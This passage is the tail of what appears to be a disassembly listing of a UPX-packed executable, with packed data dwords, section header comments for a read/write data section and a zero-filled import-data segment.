dd 0CA07619Ch, 2C13BD0Dh, 0A1233A44h, 0B5FCE9C3h, 47A7815Bh
dd 0EC8D2BFh, 0C7C3C2E8h, 0DE0419E8h, 465CEAB8h, 8E92FA20h
dd 166CCA88h, 81BCCAF0h, 0A80C3258h, 7AF19ADCh, 8CA9FE04h
dd 0D244020Fh, 86D432E1h, 79143A60h, 7BAC8614h, 0A36504B7h
dd 268C4687h, 0E5D9D368h, 0F25AA30Bh, 5C82ABD0h, 70EF1737h
dd 0E14DE054h, 46CFB9A3h, 4AEBBA2Ah, 1A26h dup(0)
UPX2 ends
; Section 4. (virtual address 00010000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00010000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31010000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start